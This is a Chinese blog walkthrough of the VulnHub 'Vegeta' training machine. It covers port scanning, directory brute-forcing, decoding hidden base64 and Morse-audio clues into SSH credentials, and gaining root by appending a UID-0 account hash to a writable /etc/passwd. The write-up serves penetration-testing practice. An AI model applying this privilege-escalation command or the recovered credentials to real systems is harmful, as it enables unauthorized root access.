vulnhub:vegeta靶场通关

最新推荐文章于 2025-10-25 16:06:20 发布
原创 最新推荐文章于 2025-10-25 16:06:20 发布 · 953 阅读 · 15 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

我用的是灵境直接搭建的靶场,下载直接就能用,很方便

目的:拿到root权限

步骤一:扫描网络

输入nmap -o 192.242.168.0 24

步骤二,kali用nmap扫描开放端口:

输入nmap -sV -sC -O 192.242.168.254

这是一个组合命令,非常强大:

  • -sV: 尝试识别端口的服务版本。不仅告诉你这是 HTTP 端口,还告诉你这是 Apache 2.4.52 还是 Nginx 1.18.0。
  • -sC: 使用 Nmap 的默认脚本进行更深入的探测。这些脚本可以发现更多信息,如 HTTP 标题、可能的漏洞提示等。
  • -O(大写): 尝试识别目标的操作系统
  • 何时用: 当你确认目标在线后,进行第一次深入扫描。这是信息收集的关键步骤,会给你大量信息。

还有其他命令

1. 基础 Ping 扫描(检查目标是否存活)

nmap -sn IP

  • -sn: 禁止端口扫描,只进行主机发现(相当于 ping)。
  • 何时用: 第一步,确认靶机已经启动并且在线。

2.nmap -p- -sV -sC -O ip

  • -p-: 扫描所有 65535 个端口。注意,这非常耗时!
  • 何时用: 当快速扫描没找到有价值的东西,或者你怀疑靶场在高端口(如 30000+)上运行了服务时。去喝杯咖啡,这需要一段时间。

3.nmap -F IP

  • -F: 快速模式,只扫描最常见的 100 个端口。
  • 何时用: 想快速了解目标开放了哪些主要服务。速度很快,但可能会错过一些不常见的高端口。

4.nmap -p 22,80,443,8000-9000

  • -p: 指定要扫描的端口。可以用逗号分隔单个端口,也可以用横杠指定范围。
  • 何时用: 你已经知道目标可能开放了某些特定端口,只想快速检查它们的状态。

不知道为什么,我的物理机能ping通靶场,虚拟机也能ping通,但是物理机的nmap就是扫不到,虚拟机反而扫得到端口

步骤三:对web网站尝试

1.进入http://192.242.168.254/

2.使用dirb遍历目录

输入dirb 192.242.168.254 (全部扫完起码半小时)

3.进入admin目录看看,发现admin.php,右键打开源码发现<?php?>显示,可能没有php环境

4.在看看其他,有个robot.txt,打开看到有一个/find_me路径

5.进入路径发现文件,打开文件,右键打开源码,拉到最下面发现base64编码

6.右键打开源码,拉到最下面发现base64编码

复制aVZCT1J3MEtHZ29BQUFBTlNVaEVVZ0FBQU1nQUFBRElDQVlBQUFDdFdLNmVBQUFIaGtsRVFWUjRuTzJad1k0c09RZ0U1LzkvK3UyMU5TdTdCd3JTaVN0QzhoR2M0SXBMOTg4L0FGanljem9BZ0RNSUFyQUJRUUEySUFqQUJnUUIySUFnQUJzUUJHQURnZ0JzUUJDQURRZ0NzQUZCQURhRUJmbjUrUmwvbk9aTFAxeER6K3g5VTA1cWJoWjFkcjRzSFQyejkwMDVxYmxaMU5uNXNuVDB6TjQzNWFUbVpsRm41OHZTMFRONzM1U1RtcHRGblowdlMwZlA3SDFUVG1wdUZuVjJ2aXdkUGJQM1RUbXB1Vm5VMmZteWRQVE0zamZscE9hdVhKUVRUamxkSHZ0YmxvNDZOUWp5UjV4eUlvZ09CUGtqVGprUlJBZUMvQkdubkFpaUEwSCtpRk5PQk5HQklIL0VLU2VDNkVDUVArS1VFMEYwakJWRS9aSGM4SEhkUHZ1RWQwZVF3N003MWFtelRIaDNCRGs4dTFPZE9zdUVkMGVRdzdNNzFhbXpUSGgzQkRrOHUxT2RPc3VFZDBlUXc3TTcxYW16VEhoM0JEazh1MU9kT3N1RWQwZVFJcWJNNENUcmhKMGhTQkZUWmtDUUdBaFN4SlFaRUNRR2doUXhaUVlFaVlFZ1JVeVpBVUZpSUVnUlUyWkFrQmdJVXNTVUdSQWtCb0lVMFRHZjAxN2UrdTRJVXNScEtSRGtXYzVsdjNEQlN4ZjFqZE5TSU1pem5NdCs0WUtYTHVvYnA2VkFrR2M1bC8zQ0JTOWQxRGRPUzRFZ3ozSXUrNFVMWHJxb2I1eVdBa0dlNVZ6MkN4ZThkRkhmT0MwRmdqekx1ZXdYTGhCL2VGazZjcm84Mm9rc2IzMTNCQkgwdkNITFc5OGRRUVE5YjhqeTFuZEhFRUhQRzdLODlkMFJSTkR6aGl4dmZYY0VFZlM4SWN0YjN4MUJCRDF2eVBMV2R5OFZaTXJwV1BDYjY2YWNEQWdTbUkrNjJTY0RnZ1RtbzI3MnlZQWdnZm1vbTMweUlFaGdQdXBtbnd3SUVwaVB1dGtuQTRJRTVxTnU5c25nOVNPMkFjcmxQN212SXd2OEg3YjVDd1NCVDlqbUx4QUVQbUdidjBBUStJUnQvZ0pCNEJPMitRc0VnVS9ZNWk4UUJENlIvUS9pMURPTFU4OHBkV3FxY3lKSTBlenFubFBxMUNBSWdveXFVNE1nQ0RLcVRnMkNJTWlvT2pVSWdpQ2o2dFFnQ0lLTXFsTnpYQkExYnhZeWk5TU1UbStVeWwvZXNSZ0VpZU0wZzlNYnBmS1hkeXdHUWVJNHplRDBScW44NVIyTFFaQTRUak00dlZFcWYzbkhZaEFranRNTVRtK1V5bC9lc1JnRWllTTBnOU1icGZLWGR5d0dRZUk0emVEMFJxbjhwYzJTUTcxWkFxZlpwd2pTVWJmc2w2cEtoRU1RajV3SUVzeWZxa3FFUXhDUG5BZ1N6SitxU29SREVJK2NDQkxNbjZwS2hFTVFqNXdJRXN5ZnFrcUVReENQbkFnU3pKK3FTb1JERUkrY0NCTE1uNm9xRHVleWpLNmVhcHdFNmNpWjdabkttS29xRHVleWpLNmVhaEFFUVI3VnFYdXFRUkFFZVZTbjdxa0dRUkRrVVoyNnB4b0VRWkJIZGVxZWFoQUVRUjdWcVh1cVFaQ0JncWcvNWpmZjEvRngzUzdXOHE2cHdia1BRUkNFK3hDa01HZnFycW5CdVE5QkVJVDdFS1F3WitxdXFjRzVEMEVRaFBzUXBEQm42cTdLY0ZtY0hzYnBvM1RLMlpGbEFnaHlPQXVDZUlNZ2g3TWdpRGNJY2pnTGduaURJSWV6SUlnM0NISTRDNEo0Z3lDSHN5Q0lONldDM1A0d1RvL3RKTEo2TDhvc0NGSjBueG9FUVpDMkxCMzNxVUVRQkduTDBuR2ZHZ1JCa0xZc0hmZXBRUkFFYWN2U2NaOGFCRUdRdGl3ZDk2bEJrSUdDZE5TcGUyYnZVMzk0Nm5mb3lPazAzN0pmdU1Ba2VGZlA3SDFPSDE3MlBuVk9wL21XL2NJRkpzRzdlbWJ2Yy9yd3N2ZXBjenJOdCt3WExqQUozdFV6ZTUvVGg1ZTlUNTNUYWI1bHYzQ0JTZkN1bnRuN25ENjg3SDNxbkU3ekxmdUZDMHlDZC9YTTN1ZjA0V1h2VStkMG1tL1pMMXhnRXJ5clovWStwdzh2ZTU4NnA5Tjh5MzdoQXZHSGZzUHlPN0pNMmFkNlp3aGkrbWdkODkyd1R3UzU3RUU3WmtjUUJMbm1RVHRtUnhBRXVlWkJPMlpIRUFTNTVrRTdaa2NRQkxubVFUdG1SNUFYQ1hJNzZnKzJBN1dRSFZrNnhFcmxUMVZkRElKNFpFRVFVeERFSXd1Q21JSWdIbGtReEJRRThjaUNJS1lnaUVjV0JERUZRVHl5akJXa1kyRDFjV0xLQitUeXdYNERRUkFFUVlUM0ljaGhFS1FXQkVFUUJCSGVoeUNIUVpCYUVBUkJFRVI0SDRJY0JrRnFzUmJFaVk2Y04zek1UaCtzK28xUy9VNEg2QUpCRUFSQk5pQUlnaURJQmdSQkVBVFpnQ0FJZ2lBYkVBUkJFR1FEZ2lESUtFRnUrTGc2NW5QSzRuVFV1MTdlRlM0d2VqUjF6bzc1bkxJNEhmV3VsM2VGQzR3ZVRaMnpZejZuTEU1SHZldmxYZUVDbzBkVDUreVl6eW1MMDFIdmVubFh1TURvMGRRNU8rWnp5dUowMUx0ZTNoVXVNSG8wZGM2TytaeXlPQjMxcnBkM2hRdU1IazJkczJNK3B5eE9SNzNyNVYzaEFxTkhVK2QwMnN1VUxOTnpJb2h4M1ExWnB1ZEVFT082RzdKTXo0a2d4blUzWkptZUUwR002MjdJTWowbmdoalgzWkJsZWs0RU1hNjdJY3YwbkFoU3hKUVoxRDJuZkMvTEhKWExjQm9ZUVR4NlR2bGVsamtxbCtFME1JSjQ5Snp5dlN4elZDN0RhV0FFOGVnNTVYdFo1cWhjaHRQQUNPTFJjOHIzc3N4UnVReW5nUkhFbytlVTcyV1pvM0laVGdNamlFZlBLZC9MTWtmbE1weVk4bEVxSC9zSlRoODZnaFNBSUxVZ1NQT2kxQ0JJTFFqU3ZDZzFDRklMZ2pRdlNnMkMxSUlnell0U2d5QzFJRWp6b3RRZ1NDMElVckNvS1NjN245TmVzcHplZmNVTTJmbFMvU29EVERrZEMzYWF3U2tuZ2d3OEhRdDJtc0VwSjRJTVBCMExkcHJCS1NlQ0REd2RDM2Fhd1NrbmdndzhIUXQybXNFcEo0SU1QQjBMZHByQktlZnJCQUY0RXdnQ3NBRkJBRFlnQ01BR0JBSFlnQ0FBR3hBRVlBT0NBR3hBRUlBTkNBS3dBVUVBTmlBSXdBWUVBZGp3SHlVRnd2VnIwS3ZGQUFBQUFFbEZUa1N1UW1DQw==

7.进入burp---Decoder模块转码

第一个框--Decode as选base64,第二个也选Decode as选base6

第三框得到一张png图片的码,

知道这是base64转图片的码,将第二个框的码复制进base64码转图片网站

8.https://base64.guru/converter/decode/image

得到一个二维码

9.二维码解码网站得到一个password:topshellv

步骤四:遍历目录还发现其他目录,访问看看

http://192.242.168.254/manual/

http://192.242.168.254/login.php 啥也没有

我刚开始用dirb没有扫描到http://192.242.168.254/bulma/这个目录

访问http://192.242.168.254/bulma/

看网上教程有我就直接访问了,发现有一段摩尔之类的音频,下载下来

到音频解码网站解码https://morsecode.world/international/decoder/audio-decoder-expert.html

点击Upload,选择下载的摩尔音频,

将网页拉到最下面,就看见解码后的数据

得到账户用户名:trunks 密码:u$3r

U S E R : T R U N K S P A S S W G R D : U S 3 R ( S I N D O L L A R S S Y M B O L )

(刚开始我还以为密码是us3r呢,后面试了很多遍不行查了才知道)

步骤五:提权

输入ssh trunks@192.242.168.254 -p 22 ,成功通过ssh进来

查看一下信息,

ls -la

ls -l /etc/passwd

uname -a

id

生成密文,将admin写入passd,并将权限改为root

用openssl passwd -1 456 生成一段密码的密文$1$qhQpvM/0$LL93mqoI3r/SUmInGwb4J0

输入

echo 'admin:$1$qhQpvM/0$LL93mqoI3r/SUmInGwb4J0:0:0:ROOT:/root:/bin/bash' >> /etc/passwd

cat /etc/passwd #查代码看写入没有

然后用admin这个账户登录,输入su admin 密码456

成功提取root账户!

jun.lee
关注
Go实现自动化压测:Vegeta与Grafana的监控整合.pdf
05-02
文档支持目录章节跳转同时还支持阅读器左侧大纲显示章节快速定位,文档内容完整、条理清晰。文档内所有文字、图表、函数、目录等元素均显示正常,无任何异常情况,敬请您放心查阅与使用。文档仅供学习参考,请勿...
terjang:基于Vegeta的可扩展HTTP负载测试工具
04-06
泰让 基于可扩展HTTP负载测试工具。 特征 可扩展:支持多个节点的工作人员 带有详细报告的Web UI 可扩展的: ...通过websocket接收实时结果 安装 ...从下载预编译的可执行文件,然后将其复制到所需的位置。...贡献
vulnhub靶场vegeta 详解喔
m0_73255659的博客
01-02 1156
vegeta 靶机。
Vulnhub】搭建Vulnhub靶机
qq_53058639的博客
01-23 6004
Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。
网络安全】渗透测试零基础入门之Vulnhub靶场PWNOS 2.0 多种渗透方法,收藏这一篇就够了!
最新发布
白帽阿叁的博客
10-25 319
摘要: 本文介绍了Vulnhub靶机PWNOS: 2.0的渗透测试方法,涉及环境搭建、端口扫描(Nmap)及两种渗透路径: CMS漏洞利用:通过Simple PHP Blog 0.4.0框架的已知漏洞(CVE-2006-3836),使用Perl脚本创建管理员账户并上传PHP木马获取反弹Shell,或直接通过Metasploit模块实现远程代码执行。 SQL注入攻击:手工注入绕过登录,利用联合查询写入Webshell,通过蚁剑连接控制靶机。 提权阶段:发现数据库配置文件中的root密码,直接登录系统完成权限提
看完这篇 教你玩转渗透测试靶机vulnhub——EvilBox-One
Aluxian_的博客
07-15 6024
Vulnhub靶机Web1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 老样子需要找到flag即可。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/evilbox/EvilBox—One.ova
【甄选靶场Vulnhub百个项目渗透——项目一:GoldenEye(密码爆破,图片逆向分析,内核提权)
xnxqwzy的博客
07-29 3846
本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。1.密码爆破(九头蛇)2.图片逆向分析(binwalk(路由逆向分析工具)exiftool(图虫)strings(识别动态库版本指令))3.内核提权(没有gcc的环境的替代方法)
【渗透测试】——VulnHub靶机渗透实战 | HA:Joker
HinsCoder的博客
09-17 5974
Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场。本文将从环境搭建、端口扫描、目录扫描到信息提取突破8080端口,尽可能排除新版本遇到的环境Bug,详解介绍渗透测试全过程。如果你是新手小白,本文将带你一窥渗透测试的世界。
VulnHub渗透实战Billu_b0x
Fly_鹏程万里
06-06 8018
简介VulnHub是一个面向所有人开放的安全靶场,里面有很多安全环境,只要下载相关镜像,在相关虚拟机上面运行就可以练习相关靶场了。里面设计了好多关,如果有耐心一定可以到达峰顶。许多考oscp人员,也会利用vulnhub靶场进行刷题。我们下载了一个经典漏洞靶场,给大家进行演示,希望让初学者知道渗透测试的套路,可以更快的成长。官网:https://www.vulnhub.com/参考了一些国外设计靶场...
原子实验室Adam项目:Vegeta-Bio-2.0的探索与实践
资源摘要信息: "Vegeta-Bio-2.0是一个由Atom Lab X Adam发布的公共项目,该项目的概况描述了一个正在持续进行的研究过程,并且鼓励社区的贡献反馈。项目涉及的领域并未直接明确,但从标题描述中可以推断,该项目...
Go性能测试工具:wrk与vegeta的压测方案设计.pdf
04-29
文档支持目录章节跳转同时还支持阅读器左侧大纲显示章节快速定位,文档内容完整、条理清晰。文档内所有文字、图表、函数、目录等元素均显示正常,无任何异常情况,敬请您放心查阅与使用。文档仅供学习参考,请勿...
Go性能压测工具:wrk与vegeta的对比测试方案.pdf
05-02
文档支持目录章节跳转同时还支持阅读器左侧大纲显示章节快速定位,文档内容完整、条理清晰。文档内所有文字、图表、函数、目录等元素均显示正常,无任何异常情况,敬请您放心查阅与使用。文档仅供学习参考,请勿...
VulnHub渗透测试实战靶场笔记(持续更新)
晚风不及你
03-05 8705
Breach1.0 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmarerastamouse进行测试提供反馈。...
看完这篇 教你玩转渗透测试靶机vulnhub——DC7
Aluxian_的博客
04-01 6680
Vulnhub靶机DC6渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC7 还是老样子只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/dc/D
【内网渗透】vulnhub三个基础靶场wp
weixin_51614272的博客
09-15 4768
ssh、msf、webdav、linux、kali、basic_pentesting_1、Me-and-My-Girlfriend-1、narak
vulnhub入门靶场
m0_58481967的博客
11-27 1646
Dns解析同时还涉及到缓存的问题,比如有的时候把host文件里的映射关系删掉了,但还是可以访问,这就涉及到缓存的问题,缓存是什么不多赘述,比如你把hosts的映射删了,但是浏览器里还有缓存,它看见你访问driftingblues.box,然后找到了之前你访问成功的缓存记录,就直接去访问之前host映射的ip地址从而加速域名解析过程。本地hosts文件是优先级最高的缓存。应该是目录文件,dirsearch目录扫描没有这个文件是因为目录扫描也是根据目录字典进行爆破的,对于目录未收录的文件,也是扫不出来的。
教你怎么用Vulnhub来搭建环境
热门推荐
大方子
09-22 2万+
0x01 前言 Vulnhub它是一个提供各种漏洞环境的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。 如果只是练习一些常见的漏洞可以看我另外两篇用Docker来搭建各种漏洞靶场(妈妈再也不用担心我没有靶场练习了)从CentOS安装Docker来搭建漏洞靶场到Joomla 3.4.5 反序列化漏洞复现(附批量Getshell脚本) 0x02 下载 https:/...
vulnhub靶场实战系列(一)之vulnhub靶场介绍
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-07 3881
我们在学习了各种web漏洞的原理各种内网的攻击手法的利用之后,需要实战来提升经验,这一环节就可以有操作系统靶场平台来代替一方面因为靶场是现成的,已经搭建好的靶场,只需要下载到本地用虚拟机安装就可以了,非常省时。第二点,非常安全,我们要知道没有经过法律允许的渗透行为是犯法的,而我们使用靶场来模拟达到实战训练的目的的同时也不会触碰法律。名称描述网站vulnhub与Kali同一家公司(offsec)出品。一共有600多个镜像,可以在VMWare或者VirtualBox打开,有不同难度。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值